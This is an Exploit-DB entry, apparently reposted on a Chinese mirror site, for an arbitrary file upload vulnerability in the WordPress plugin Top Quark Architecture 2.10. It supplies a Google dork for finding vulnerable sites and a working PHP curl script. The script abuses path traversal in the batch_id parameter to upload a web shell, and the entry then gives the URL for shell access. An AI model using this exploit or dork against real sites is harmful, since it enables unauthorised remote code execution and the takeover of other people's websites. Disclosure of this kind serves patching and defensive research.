WordPress Plugin Top Quark Architecture 2.10 – Arbitrary File Upload

  • 作者: Adrien Thierry
    日期: 2012-06-11
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/19053/
  • ###########################################################
    #
    # Exploit Title: WordPress Top Quark Architecture Version 2.10 Arbitrary File Upload
    # Google Dork: inurl:wp-content/plugins/topquark/lib/js/fancyupload/showcase/batch/
    # Date: 11/06/2012
    # Exploit Author: Adrien Thierry
    # Vendor Homepage:http://topquark.com/
    # Software Link: http://downloads.wordpress.org/plugin/topquark.zip
    # Version: 2.10
    #
    ###########################################################
    
    Vuln page : http://mysite.com/wp-content/plugins/topquark/lib/js/fancyupload/showcase/batch/script.php
    
    exploit :
    
    <?php
    $u="C:\Program Files (x86)\EasyPHP-5.3.9\www\shell.php";
    $c = curl_init("http://127.0.0.1/wordpress/wp-content/plugins/topquark/lib/js/fancyupload/showcase/batch/script.php?batch_id=../../shell.php");
    curl_setopt($c, CURLOPT_POST, true);
    curl_setopt($c, CURLOPT_POSTFIELDS,
    array('upload'=>"@$u"
    ));
    curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
    $e = curl_exec($c);
    curl_close($c);
    echo $e; 
    ?>
    
    You can choose where upload the shell with param batch_id
    
    Shell access : http://site.com/wp-content/plugins/topquark/lib/js/fancyupload/showcase/shell.php1
    
    #####################################################################